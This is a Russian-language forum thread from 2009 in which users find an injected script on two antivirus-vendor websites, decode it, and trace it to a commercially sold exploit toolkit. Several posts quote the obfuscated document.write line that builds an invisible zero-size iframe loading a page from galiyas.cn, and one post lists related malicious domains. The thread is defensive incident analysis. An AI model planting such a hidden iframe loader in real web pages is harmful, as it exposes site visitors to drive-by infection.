На этих двух сайтах скрипт
pandasecurity.com/russia/
viruslab.ru
Код:document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');
На этих двух сайтах скрипт
pandasecurity.com/russia/
viruslab.ru
Код:document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Вебовский онлайн сканер сказал на viruslab.ru
http://online.us.drweb.com/cache/?i=...281627f254047e
Он у них там с 14 августа находится, причём у панды ихний автомат сам себя занёс в блек-лист
а у мну вместо этого
оказалось это</div>
<script>document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');</script>
</div>
</div>
<!-- Kill AD JavaScript: "if" -->
</div>. блин опять самое интересное пропускаю, жалко что galiyas точка cn/show.php?s=0be7fb3bca не работает, а так хотелось глянуть чтож-там грузить пытались
http://www.virustotal.com/ru/analisi...352-1250730484Сообщение от Virtual
http://www.virustotal.com/ru/analisi...352-1250777968
http://www.virustotal.com/ru/analisi...093-1250778731
http://www.virustotal.com/ru/analisi...ad9-1250780189
http://www.anti-malware.ru/forum/ind...opic=9263&st=0
Там еще вчера обсуждалось
The worst foe lies within the self...
Хм, они меня спрашивают
может это нормальный скрипт?Опишите подробнее почему вы так решили?
Кста galiyas точка cn/show.php?s=0be7fb3bca снова заработал
Последний раз редактировалось valho; 21.08.2009 в 17:04. Причина: добавлено
Нет
у мну фильтр именно сработал на то что он не нормальный! т.к. если ктот пытается сгенерить фрейм через яву да при том разделяя слово iframe (тупая попытка спрятатся от простейших
а тут совсем странное:
расшифровываю:</div>
<script>document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');</script>
</div>
выдать в документ фрейм, при том - не засвечивая ключевого слова iframe, загрузить туда результат пхп скрипта с неизвестным содержимым, и самое главное все это должно быть нулевой ширины и нулевой высоты- тоесть невидимым. + все это грузится с сайта антивирусной компании но из кытая
ЗЫЗЫ пойду- ка разошлю новость что вируслаб специально пытается заразить клиентов дабы впихнуть им панду
добавлено...
хотя.... анализируя.... это ка- же понимать или ктот имеющий админку на обоих сайтах прое..... пароли или сами всетаки, хотя без разницы,... думаю нужно будет озвучить что они это специально, чтоб неповадно было
valho кто они, где они? давай их сюда, ща обьясню что там не так,
//простите за офтоп хорошо в деревне, с любимой тещей, до понедельника it проблемы совсем не мои, а у кое-кого чую голова болеть будет
Последний раз редактировалось Virtual; 21.08.2009 в 20:50.
и те и другие убрали его, вроде, еле уговорили
Добавлено через 52 минуты
Написал в техподдержку на viruslab.ru, это как раз они. Ещё неделю назад послал письмо на pandasecurity.com спрашивал почему у них автомат свой же сайт в блек-лист занёс, никто не ответил. Но я не догадался тогда посмотреть html страницы. Мне сеня (senyak) как раз вчера ссылу дал на антималваре, тут и вспомнил про пандасекурити.ком там как раз и оказался точно такой же скрипт.valho кто они, где они? давай их сюда, ща обьясню что там не так,
На паре форумов нашёл объявления о продаже тулкита и правда за 800 $
предлагают
http://imageshost.ru/links/5e3310236...749b8962f6164a
http://imageshost.ru/links/ef14e8d9d...127f250b289e38
http://imageshost.ru/links/9137e6968...9f1886aa278274
http://imageshost.ru/links/2860db984...8c6f7d1ee9820b
http://imageshost.ru/links/61437fa16...7ac693c9bc1d9a
http://imageshost.ru/links/da18fe286...61f71bb3fe8df2
Добавлено через 4 часа 6 минут
Вот они, родненькие, все на одном адресе
galiyas.cn
fragus.cn
nasha-anasha.cn
neimeetsmysla.cn
bugagag.cn
yessvaz.cn
commada.cn
zenitvsspartak.cn
http://wepawet.cs.ucsb.edu/view.php?...193022&type=js
Последний раз редактировалось valho; 22.08.2009 в 01:25. Причина: Добавлено
Посмотрел за ними, на панде этот скрипт убрали, потом он снова появился минут на 5 и его снова убрали. На вируслаб.ру его тоже убрали, минут через 20 он снова появился и до сих пор там живёт у них
всетаки они прое... пароли, + похоже конек у когото до сих пор активный
Virtual +1
Начинающим КуЛьХаЦкЕрАм, а так же продвинутым! - http://www.uk-rf.com/glava28.html
Ваши права в разделе
Ответить с цитированием
